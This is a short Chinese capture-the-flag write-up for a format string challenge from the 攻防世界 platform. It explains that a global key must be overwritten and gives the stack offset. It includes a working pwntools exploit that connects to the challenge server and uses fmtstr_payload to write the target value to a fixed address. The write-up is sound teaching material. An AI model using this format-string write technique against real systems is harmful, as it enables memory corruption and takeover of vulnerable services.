PWN-格式化字符串-攻防世界_实时数据检测

Created2020-11-24|Updated2024-05-08

|Post View:

key是全局变量，需要将key改变为特殊值35795746才行

格式化字符串原理图:

可以看出AAAA偏离自己的首地址的地址(也就是format string)的偏移量为12

key变量地址:

EXP:

from pwn import *
r = remote("111.200.241.244", 33670)
key_addr = 0x804A048    #这是key变量的地址
payload = fmtstr_payload(12, {key_addr:35795746})   #写偏移的新方法
r.sendline(payload)
r.interactive()

Author: Re1own

Link: https://re1own.github.io/2020/11/24/PWN-%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2-%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C-%E5%AE%9E%E6%97%B6%E6%95%B0%E6%8D%AE%E6%A3%80%E6%B5%8B/

Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.

Donate

wechat
alipay

Related Articles

PWN-64位ROP-Bugku_PWN4

PWN-pwnable.kr.fd

PWN-整数溢出&栈溢出-bugku_pwn11

PWN-格式化字符串漏洞-攻防世界CGfsb

ROP-花式栈溢出stack_pivoting

ROP-64位-ret2libc

Local search